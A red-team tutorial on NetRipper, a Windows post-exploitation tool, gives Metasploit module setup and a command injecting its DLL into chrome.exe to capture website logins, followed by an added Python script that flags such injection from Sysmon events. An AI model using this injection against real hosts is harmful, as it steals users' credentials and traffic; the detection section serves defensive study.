Red Team Attack and Defense: Obtaining Passwords from Memory
0X01 NetRipper
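NetRipper is a post-exploitation tool for Windows systems. It uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, which lets it capture both plaintext traffic and encrypted traffic before encryption / after decryption.
0X02 Usage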
Injection: NetRipper.exe DLLpath.dll processname.exe
Metasploit module
msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
Set PROCESSNAMES or PROCESSIDS and run.
Metasploit installation (Kali)
- mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
- cp Metasploit/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
- cp x86/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
- cp x64/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll
Metasploit installation (/opt/metasploit-framework)
- mkdir /opt/metasploit-framework/modules/post/windows/gather/netripper
- cp Metasploit/netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
- cp x86/DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
- cp x64/DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll
0x03 Demonstration
Run the command to inject the DLL into the Chrome browser:
NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe
Log in to any website, then look in the temp directory.
This can also be done through PowerShell.
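0x04 Takeaway
On a compromised host, injecting into a process makes it possible to obtain important information. This can be combined with MSF.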
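
Seen from the defender's side, the injection in section 0x03 is a non-browser image starting a thread in chrome.exe, followed by an unsigned DLL loading from a user-writable path. The following is an added example, not part of the original post or the NetRipper project. It assumes Sysmon Event ID 7 (ImageLoad) and Event ID 8 (CreateRemoteThread) records already parsed into dictionaries; the watch lists and sample events are constructed for illustration.

```python
import ntpath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}            # assumed watch list
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\", "\\programdata\\")  # assumed path markers

def _base(path):
    return ntpath.basename(path).lower()

def suspicious(event):
    """Return a reason string if the event looks like injection into a browser, else None."""
    eid = event.get("EventID")
    if eid == 7:  # Sysmon ImageLoad
        loaded = event.get("ImageLoaded", "").lower()
        if (_base(event.get("Image", "")) in BROWSERS
                and any(marker in loaded for marker in USER_WRITABLE)
                and event.get("Signed", "false").lower() != "true"):
            return "unsigned DLL from user-writable path loaded into browser"
    elif eid == 8:  # Sysmon CreateRemoteThread
        src, dst = event.get("SourceImage", ""), event.get("TargetImage", "")
        if _base(dst) in BROWSERS and src.lower() != dst.lower():
            return "remote thread created in browser by another image"
    return None

def triage(events):
    """Return (EventID, reason) for every event that matches a rule."""
    return [(e["EventID"], reason) for e in events if (reason := suspicious(e))]

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
USER_CHROME = r"C:\Users\ailishi\AppData\Local\Google\Chrome\Application\chrome.exe"

# Constructed sample events; the first two mirror the command shown in section 0x03.
SAMPLE_EVENTS = [
    {"EventID": 8, "TargetImage": CHROME,
     "SourceImage": r"C:\Users\ailishi\Downloads\NetRipper-master\x64\NetRipper.x64.exe"},
    {"EventID": 7, "Image": CHROME, "Signed": "false",
     "ImageLoaded": r"C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll"},
    # Per-user browser install: user-writable path but signed, so not flagged.
    {"EventID": 7, "Image": USER_CHROME, "Signed": "true",
     "ImageLoaded": r"C:\Users\ailishi\AppData\Local\Google\Chrome\Application\chrome_elf.dll"},
    # The browser creating threads in its own child processes is normal.
    {"EventID": 8, "SourceImage": CHROME, "TargetImage": CHROME},
    # Unsigned DLL in a non-browser process is out of scope for this rule.
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe", "Signed": "false",
     "ImageLoaded": r"C:\Users\ailishi\Downloads\plugin.dll"},
]

if __name__ == "__main__":
    for eid, reason in triage(SAMPLE_EVENTS):
        print(eid, reason)
```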